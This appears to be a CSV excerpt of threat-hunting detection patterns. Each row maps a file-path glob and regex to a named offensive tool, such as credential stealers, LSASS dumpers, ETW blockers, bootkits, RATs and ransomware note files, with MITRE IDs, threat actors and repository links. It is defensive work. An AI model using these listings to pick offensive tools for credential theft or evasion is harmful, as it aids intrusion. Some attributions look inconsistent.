"*\biglock.txt*",".{0,1000}\\biglock\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14302"
"*\bin\cme.exe*",".{0,1000}\\bin\\cme\.exe.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14304"
"*\bin\HostX64\x64\c2.dll*",".{0,1000}\\bin\\HostX64\\x64\\c2\.dll.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#content","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","14305"
"*\bin\Release\SchTask.exe*",".{0,1000}\\bin\\Release\\SchTask\.exe.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","N/A","N/A","10","6","532","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z","14307"
"*\bin\shepard\*",".{0,1000}\\bin\\shepard\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","14308"
"*\bin\uactoken.x86.o*",".{0,1000}\\bin\\uactoken\.x86\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14310"
"*\bin\uactoken2.x64.o*",".{0,1000}\\bin\\uactoken2\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14311"
"*\bin\wmiexec.x64.o*",".{0,1000}\\bin\\wmiexec\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14312"
"*\bin2hex.lua*",".{0,1000}\\bin2hex\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","14313"
"*\BindShell.exe*",".{0,1000}\\BindShell\.exe.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","14314"
"*\bindshell.lua*",".{0,1000}\\bindshell\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","14315"
"*\BITB-main*",".{0,1000}\\BITB\-main.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","N/A","10","10","2823","474","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z","14316"
"*\bitdefender\getCredsbitdefender.h*",".{0,1000}\\bitdefender\\getCredsbitdefender\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14317"
"*\bitdefender\getCredsbitdefender2.h*",".{0,1000}\\bitdefender\\getCredsbitdefender2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14318"
"*\bitpaymer_v1.txt*",".{0,1000}\\bitpaymer_v1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14320"
"*\bitpaymer_v2.txt*",".{0,1000}\\bitpaymer_v2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14321"
"*\bitransomware.txt*",".{0,1000}\\bitransomware\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14322"
"*\BITSInject.py*",".{0,1000}\\BITSInject\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","14323"
"*\BITSInject-master*",".{0,1000}\\BITSInject\-master.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","14324"
"*\BITSJobPayloads.py*",".{0,1000}\\BITSJobPayloads\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","0","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","14325"
"*\bitwarden\plugin\getCredsbitwardenPluginChrome.h*",".{0,1000}\\bitwarden\\plugin\\getCredsbitwardenPluginChrome\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14327"
"*\bitwarden\plugin\getCredsbitwardenPluginChrome2.h*",".{0,1000}\\bitwarden\\plugin\\getCredsbitwardenPluginChrome2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14328"
"*\blackbasta1.txt*",".{0,1000}\\blackbasta1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14329"
"*\blackbasta2.txt*",".{0,1000}\\blackbasta2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14330"
"*\blackbasta3.txt*",".{0,1000}\\blackbasta3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14331"
"*\blackbasta4.txt*",".{0,1000}\\blackbasta4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14332"
"*\blackbyte_v2.txt*",".{0,1000}\\blackbyte_v2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14333"
"*\Black-key Spoofer.exe*",".{0,1000}\\Black\-key\sSpoofer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14334"
"*\Blackout.cpp*",".{0,1000}\\Blackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14335"
"*\Blackout.exe*",".{0,1000}\\Blackout\.exe.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14336"
"*\Blackout.sln*",".{0,1000}\\Blackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14337"
"*\Blackout.sys*",".{0,1000}\\Blackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14338"
"*\Blackout.sys*",".{0,1000}\\Blackout\.sys.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","14339"
"*\Blackout.vcxproj*",".{0,1000}\\Blackout\.vcxproj.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","14340"
"*\Blank.Grabber.zip*",".{0,1000}\\Blank\.Grabber\.zip.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","14341"
"*\BlankOBF.py*",".{0,1000}\\BlankOBF\.py.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","14342"
"*\BlankOBFv2.py*",".{0,1000}\\BlankOBFv2\.py.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","0","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","14343"
"*\blindeventlog.exe*",".{0,1000}\\blindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","14344"
"*\blindsight.exe*",".{0,1000}\\blindsight\.exe.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","14345"
"*\Blizzard-RAT lite.exe*",".{0,1000}\\Blizzard\-RAT\slite\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14346"
"*\block_dll_policy.exe*",".{0,1000}\\block_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","14347"
"*\blocketw.bin*",".{0,1000}\\blocketw\.bin.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14348"
"*\blocketw.csproj*",".{0,1000}\\blocketw\.csproj.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14349"
"*\blocketw.exe*",".{0,1000}\\blocketw\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14350"
"*\blocketw.exe*",".{0,1000}\\blocketw\.exe.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14351"
"*\blocketw.pdb*",".{0,1000}\\blocketw\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14352"
"*\blocketw.pdb*",".{0,1000}\\blocketw\.pdb.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14353"
"*\blocketw.sln*",".{0,1000}\\blocketw\.sln.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14354"
"*\BlockEtw-master*",".{0,1000}BlockEtw\-master.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14355"
"*\BlockEtw-master\*",".{0,1000}\\BlockEtw\-master\\.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14356"
"*\BloodHound.bin*",".{0,1000}\\BloodHound\.bin.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","14357"
"*\BloodHound.exe*",".{0,1000}\\BloodHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","14358"
"*\BloodHoundGui\*.exe*",".{0,1000}\\BloodHoundGui\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","14359"
"*\bloodhoundsync.py*",".{0,1000}\\bloodhoundsync\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","14360"
"*\BloodHound-win32-X64*",".{0,1000}\\BloodHound\-win32\-X64.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","14361"
"*\BluePalmRAT.exe*",".{0,1000}\\BluePalmRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14362"
"*\bofhound.py*",".{0,1000}\\bofhound\.py.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","N/A","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","14363"
"*\BOF-Template\x64\*",".{0,1000}\\BOF\-Template\\x64\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14364"
"*\Boot\EfiGuardDxe.efi*",".{0,1000}\\Boot\\EfiGuardDxe\.efi.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","14372"
"*\bootkit-rs*",".{0,1000}\\bootkit\-rs.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","14373"
"*\boxreflect.dll*",".{0,1000}\\boxreflect\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14381"
